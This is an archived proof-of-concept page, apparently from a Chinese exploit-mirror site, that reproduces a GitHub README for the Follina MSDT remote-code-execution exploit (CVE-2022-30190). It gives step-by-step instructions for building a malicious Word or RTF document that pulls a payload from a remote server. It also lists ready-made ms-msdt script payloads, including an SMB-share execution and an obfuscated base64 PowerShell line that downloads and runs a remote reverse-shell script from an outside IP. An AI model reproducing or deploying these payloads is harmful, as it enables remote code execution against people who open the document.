POC详情: f41b3532b046664090abcf1497f67c63c05e33fa

来源
https://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina
关联漏洞
标题: Microsoft Windows Support Diagnostic Tool 操作系统命令注入漏洞 (CVE-2022-30190)
描述:Microsoft Windows Support Diagnostic Tool是美国微软(Microsoft)公司的收集信息以发送给 Microsoft 支持的工具。 Microsoft Windows Support Diagnostic Tool (MSDT)存在操作系统命令注入漏洞。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows
描述
CVE-2022-30190 | MS-MSDT Follina One Click
介绍
# MS-MSDT-Office-RCE-Follina
CVE-2022-30190 | MS-MSDT Follina One Click

1. Create a Docx file.
2. In the Docx file, Insert > Object > Bitmap Image > Ok
3. In the Paint application that launched, save the Paint file.
4. Save your Docx file.
5. Open your file as an archive (With 7Zip; Right Click > 7Zip > Open Archive.)
6. Copy out the Document.xml from \Word\ and document.xml.rels file from \word_rels\
7. Open/Edit the \word\_rels\Document.xml.rels and locate the relationship XML Tag with "/relationships/oleObject". After this replace the destination in "Target=" to your remote destination where it will grab the payload from. Also add "TargetMode="External"" to the XML Tag.
8. Compress back to Docx file (Send to > Compressed (zipped) folder  |  Rename file type from zip > docx/doc )

--------------------------------------------------------------------------------------------------------
### RTF File Type
Once a docx has been saved utilizing the paramaters step / paramaters below. Save the Docx as an RTF.

> If you also add these elements under the `<o:OLEObject>` element in `word/document.xml`:

```
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>
```

--------------------------------------------------------------------------------------------------------
The act of recompressing can be observed from JohnHammond's Python Script as well:  
    ~ Rebuild the original office file ~  
    
    shutil.make_archive(args.output, "zip", doc_path)  
    os.rename(args.output + ".zip", args.output)  
    
Reference: https://github.com/JohnHammond/msdt-follina/blob/main/follina.py



--------------------------------------------------------------------------------------------------------





## Payloads 

### Basic Calc Execute:
```
<script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>
```

Can Replace the Start-Process('calc') with:
> IEX('calc.exe')
--------------------------------------------------------------------------------------------------------
### SMB Share Execution:

```
<script>
location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=/../../$(\\\\taretip\\share\\poc)/.exe)"";
</script>
```
--------------------------------------------------------------------------------------------------------
### PS1 File Load:
```
<script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'cG93ZXJzaGVsbC5leGUgLWMgImlleCAoaXdyIGh0dHA6Ly8xOTIuMTY4LjE5OC4xMjgvcmV2LnBzMSAtVXNlQmFzaWNQYXJzaW5nKSIK'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>  
```

Decoded:
Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("powershell.exe -c "iex (iwr http://192.168.198.128/rev.ps1 -UseBasicParsing)""))

--------------------------------------------------------------------------------------------------------
### Apache2 access.log should show connection upon opening file
![Log Example](/log.png?raw=true "Example")
文件快照

 [4.0K]  /data/pocs/f41b3532b046664090abcf1497f67c63c05e33fa
├── [4.0K]  doc
│   ├── [1.3K]  [Content_Types].xml
│   ├── [4.0K]  docProps
│   │   ├── [ 704]  app.xml
│   │   └── [ 735]  core.xml
│   └── [4.0K]  word
│       ├── [3.8K]  document.xml
│       ├── [1.5K]  fontTable.xml
│       ├── [4.0K]  _rels
│       │   └── [ 991]  document.xml.rels
│       ├── [2.9K]  settings.xml
│       ├── [ 29K]  styles.xml
│       ├── [4.0K]  theme
│       │   └── [6.6K]  theme1.xml
│       └── [ 803]  webSettings.xml
├── [ 10K]  file.docx
├── [9.4K]  index.html
├── [126K]  log.png
└── [3.6K]  README.md

5 directories, 14 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。